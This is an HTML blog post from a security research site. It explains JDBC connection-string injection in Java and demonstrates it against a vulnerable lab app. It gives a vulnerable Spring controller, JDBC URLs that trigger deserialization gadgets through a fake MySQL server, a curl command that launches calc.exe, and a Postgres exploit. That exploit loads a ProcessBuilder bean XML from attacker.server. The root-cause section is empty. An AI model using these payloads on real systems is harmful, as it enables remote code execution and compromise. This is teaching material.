<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>JDBC Injection to RCE | zdaylabs</title>
  <style>
    body {
      margin: 0;
      font-family: 'Segoe UI', sans-serif;
      background: linear-gradient(135deg, #1a1f2e 0%, #2d3748 50%, #1e3a5f 100%);
      color: #dcdcdc;
      line-height: 1.6;
      padding: 0 2rem;
      min-height: 100vh;
    }
    
    header {
      display: flex;
      justify-content: space-between;
      align-items: center;
      padding: 2rem 0 1rem;
      border-bottom: 1px solid #333;
    }
    
    .logo {
      font-size: 1.5rem;
      font-weight: bold;
      color: #ffffff;
    }
    
    nav a {
      margin: 0 1rem;
      text-decoration: none;
      color: #ccc;
      font-size: 0.95rem;
    }
    
    nav a:hover {
      color: #fef200;
    }
    
    .socials a {
      margin-left: 1rem;
      color: #999;
      font-size: 1.2rem;
      text-decoration: none;
    }
    
    main {
      max-width: 1000px;
      margin: 2rem auto;
      padding: 0 1rem;
    }
    
    h1 {
      font-size: 2.5rem;
      color: #fff;
      margin-bottom: 1rem;
    }
    
    h2 {
      color: #fef200;
      font-size: 1.8rem;
      margin: 2rem 0 1rem;
      border-bottom: 2px solid #333;
      padding-bottom: 0.5rem;
    }
    
    h3 {
      color: #fef200;
      font-size: 1.4rem;
      margin: 1.5rem 0 0.8rem;
    }
    
    h4 {
      color: #fef200;
    }
    
    .highlight {
      color: #fef200;
      font-weight: 600;
    }
    
    .accent {
      color: #36d1dc;
    }
    
    p {
      color: #bbb;
      margin-bottom: 1rem;
    }
    
    pre {
      background-color: #1e2329;
      border: 1px solid #333;
      border-radius: 4px;
      padding: 1rem;
      overflow-x: auto;
      margin: 1rem 0;
    }
    
    code {
      color: #36d1dc;
      font-family: 'Courier New', monospace;
    }
    
    a {
      color: #36d1dc;
      text-decoration: none;
    }
    
    a:hover {
      color: #fef200;
    }
    
    ul, ol {
      color: #bbb;
    }
    
    li {
      margin-bottom: 0.5rem;
    }
    
    img {
      max-width: 100%;
      height: auto;
      border-radius: 4px;
      margin: 1rem 0;
    }
  </style>
</head>
<body>
  <header>
    <div class="logo">⚡ ZDaylabs</div>
    <nav>
      <a href="index.html">Home</a>
      <a href="blogs.html">Blogs</a>
      <a href="research.html">Research</a>
      <a href="policy.html">Disclosure Policy</a>
      <a href="contact.html">Contact</a>
    </nav>
    <div class="socials">
      <a href="#">🔗Linkedin</a>
      <a href="#">🐦Twitter</a>
    </div>
  </header>

  <main>
        <h2>JDBC Injection to Remote Code Execution</h2>
        <div>In this blog post we will learn about JDBC Injection. How can we exploit it and root cause analysis of the Issue.</div>
        <div>
            <br />
        </div>
        <h3 style="text-align: left;">Contents:</h3>
        <div>
            <ul style="text-align: left;">
                <li>What is JDBC Injection</li>
                <li>Vulnerable Code Signature</li>
                <li>Exploitation</li>
                <li>Root Cause Analysis</li>
                <li>Mitigation</li>
                <li>Building Own Malicious MySql Server</li>
                <li>Exploiting Postgres Drivers</li>
            </ul>
            <h3 style="text-align: left;">What is JDBC Injection:</h3>
            <p style="text-align: left;">JDBC Injection refers to an attack where the attacker can control the JDBC Connection strings and which which the attacker can gain remote Code Execution leading to complete compromise of the application.</p>
            <p style="text-align: left;">But Why any application will let you do that?</p>
            <p style="text-align: left;">Think of applications such as Oracle's WebLogic.</p>
            <p style="text-align: left;">Application as this let you configure the Database you want you application to use.</p>
            <p style="text-align: left;">And for that it needs to take the JDBC string from you.</p>
            <p style="text-align: left;">Apart from this application there are many other applications from vendors like VMware , Oracle, Nutanix , Apache which lets you set the JDBC url.</p>
            <p style="text-align: left;">So depending on the business logic your application may ask the user to configure JDBC Strings which can be abused to gain code execution given certain conditions are meth(Which we will discuss on RCA Section)</p>
            <h3 style="text-align: left;">Vulnerable Code Signature:</h3>
            <p style="text-align: left;">The vulnerable code signature more or les looks like below.</p>
            <div style="background-color: #1e1f22; color: #bcbec4;"><pre style="font-family: 'JetBrains Mono',monospace; font-size: 9.8pt;"><span style="color: #b3ae60;">@RestController<br /></span><span style="color: #cf8e6d;">public class </span>newtest {<br /><br />    <span style="color: #b3ae60;">@GetMapping</span>(<span style="color: #6aab73;">"/jdbcdata"</span>)<br />    <span style="color: #cf8e6d;">public void </span><span style="color: #56a8f5;">test</span>(<span style="color: #b3ae60;">@RequestParam </span>String jstr)<br />    {<br />        <span style="color: #cf8e6d;">try</span>{<br />            String url=jstr;<br />            Connection conn = DriverManager.<span style="font-style: italic;">getConnection</span>(url);<br />        }<span style="color: #cf8e6d;">catch</span>(Exception e)<br />        {<br />            e.printStackTrace();<br />        }<br /><br />    }<br />}</pre></div>
            <p style="text-align: left;">jstr which has been taken from the user has been assigned to urlpassed to DriverManager.getConnection().</p>
                <p style="text-align: left;">The final sink function here is the DriverManager.getConnection().</p>
                <h3>Exploitation:</h3>
                <p style="text-align: left;">To exploit this flaw we have to set up a fake mysql server which is respond with a Malicious Serialized object which upon getting deserialized will give us code execution.</p>
                <p style="text-align: left;">Note: The exploitation depends on the JDK version and available gadgets.</p>
                <p style="text-align: left;">
                    <br />
                </p>
                <p style="text-align: left;">So lets download a fake mysql server from the github.</p>
                <div><a href="https://github.com/4ra1n/mysql-fake-server/releases">https://github.com/4ra1n/mysql-fake-server/releases</a></div>
                <div>Lets download the CLI jar.</div>
                <div>
                    <br />
                </div>
                <div>Run the jar file</div>
                
                <pre><code>java -jar fake-mysql-cli-0.0.4.jar
</code></pre>
                
                <div>Now the JDBC String you have to send to the vulnerable application looks something like below.</div>
                
                <pre><code>jdbc:mysql://68.183.70.210:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=deser_&ltgadget_name>_&ltbinary_name>
</code></pre>
                
                <div>For example if you want to use commonBeanUtils gadget with binary to be notepad.exe then the JDBC string looks like below.</div>
                
                <pre><code>jdbc:mysql://68.183.70.210:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=deser_CB_notepad.exe
</code></pre>
                
                <div>
                    <br />
                </div>
                <div>So lets download a Vulnerable Springboot App from <a href="https://github.com/w3bspl01t3r/vulnerableLabs/tree/main/jdbcInjection">Github</a></div>
                <div>
                    <br />
                </div>
                <div>If you check out the code you can clearly see code is same as shown above.</div>
                <div>
                    <br />
                </div>
                <div>Start the fake mysql server.</div>
                <div>
                    
                    <pre><code>java -jar fake-mysql-cli-0.0.4.jar
</code></pre>
                    
                    <div><img src="images/jdbcinjection/fakemysqlserver.png"></div>
                    <div>
                        <br />
                    </div>
                    <div>Fire the below curl command</div>
                    
                    <pre><code>curl http://localhost:8080//jdbcdata?jstr=jdbc:mysql://68.183.70.210:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=deser_CC31_calc.exe
</code></pre>
                    <div><video width="900" controls><source src="videos/mysqlexploit.mp4" type="video/mp4"></video></div>
                    <div>you can see the calc.exe got popped up.</div>
                </div>
                <h3 style="text-align: left;">Root Cause Analysis<br /><br /></h3>
                <h3 style="text-align: left;">Mitigation:<br /></h3>
                <p style="text-align: left;">To fix these issues update your JDBC Drivers to the latest Versions.</p>
                <h3 style="text-align: left;">Building Own Malicious Server</h3>
                <h3 style="text-align: left;">Exploiting Postgres Driver</h3>
                    <p>Instead of Mysql if the Application uses Postgres Connector then we can exploit it using the followsing steps</p>
                    <ul>
                        <li>Host a bean xml file with the following contents</li>
<pre><code>&lt;beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"&gt;
&lt;bean id="pb" class="java.lang.ProcessBuilder"&gt;
&lt;constructor-arg&gt;
&lt;list&gt;
&lt;value&gt;calc.exe&lt;/value&gt;
&lt;/list&gt;
&lt;/constructor-arg&gt;
&lt;property name="whatever" value="#{ pb.start() }" /&gt;
&lt;/bean&gt;
&lt;/beans&gt;
</code></pre>
                        <li>Pass the below JDBC Url to the target application</li>
<pre><code>jdbc:postgresql://canbeanything/saas?&socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://attacker.server:9001/test.xml
</code></pre>
                    </ul>
                    <div>
                    </div>
                <div><video width="900" controls><source src="videos/Postgresexploit.mp4" type="video/mp4"></video></div>
                <div>
                    <p>
                        <i><b>Note:</b> The attack will only work if the Postgres JDBC Connector versions are >= 9.4.1208, < 42.2.25 ,>= 42.3.0, < 42.3.2</i>
                    </p>
                </div>
        <div>&nbsp;</div>
        
        <div>
            <p></p>
        </div>
        <br>
        <br>
        <p><b>Thats it For this Blog.</b></p>
        <p><b>Thanks For Reading.</b></p>
        <p><b>Happy Hacking.</b></p>
        <p><b>You can connect with me at:</b></p>
        <p><a href="https://www.linkedin.com/in/swagatkumar/">Linkedin</a></p>
        <p><a href="https://x.com/webspl01t3r">Twitter</a></p>

  </main>
</body>
</html>